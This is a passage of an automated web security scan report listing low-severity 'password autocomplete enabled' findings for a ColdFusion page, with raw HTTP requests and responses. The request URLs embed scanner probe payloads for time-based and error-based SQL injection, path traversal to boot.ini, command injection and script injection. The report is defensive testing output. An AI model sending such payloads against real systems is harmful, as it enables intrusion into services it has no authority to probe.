Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=SET%20%2FA%200xFFF9999-2%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.209. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=SELECT%20SLEEP(25)--+

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=SELECT%20SLEEP(25)--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=SELECT%20SLEEP(25)--+" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.210. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=../../../../../../../../../../boot.ini

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../boot.ini HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../boot.ini" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.211. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /hmc/report/index.cfm HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:28 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:28 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:28 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:28 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">

<form name="form1" action="/hmc/report/index.cfm?" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.212. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=(select+sleep(25))a--+1

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=(select+sleep(25))a--+1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:05 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:05 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=(select+sleep(25))a--+1" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.213. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

Response

17.214. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register='

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register='" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.215. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:52 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:52 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.216. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%22%2Bresponse.write(268409241-22)%2B%22

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=%22%2Bresponse.write(268409241-22)%2B%22 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%22%2Bresponse.write(268409241-22)%2B%22" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.217. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register='%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B'

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register='%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register='%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B'" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.218. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=1))%3BSELECT%20pg_sleep(25)--

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=1))%3BSELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e3042a9b6d0213f1e43
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:10 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:10 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=1))%3BSELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.219. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=1;WAITFOR%20DELAY%20%270:0:25%27--

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=1;WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=1;WAITFOR%20DELAY%20%270:0:25%27--" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.220. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=1NS_NO

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=1NS_NO HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=1NS_NO" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.221. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=1);WAITFOR%20DELAY%20%270:0:25%27--

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=1);WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=1);WAITFOR%20DELAY%20%270:0:25%27--" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.222. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fboot.ini

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fboot.ini HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fboot.ini" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.223. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register='+OR+'ns'%3d'ns

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register='+OR+'ns'%3d'ns HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register='+OR+'ns'%3d'ns" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.224. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%22%26expr+268409241%20-%202%20%26%22

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=%22%26expr+268409241%20-%202%20%26%22 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%22%26expr+268409241%20-%202%20%26%22" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.225. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?nsextt=%00%27%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00000c)%3c%2fscript%3e

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /hmc/report/index.cfm?nsextt=%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x00000C)%3C%2Fscript%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:40 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:40 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">

<form name="form1" action="/hmc/report/index.cfm?nsextt=%00%27%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00000c)%3c%2fscript%3e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.226. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

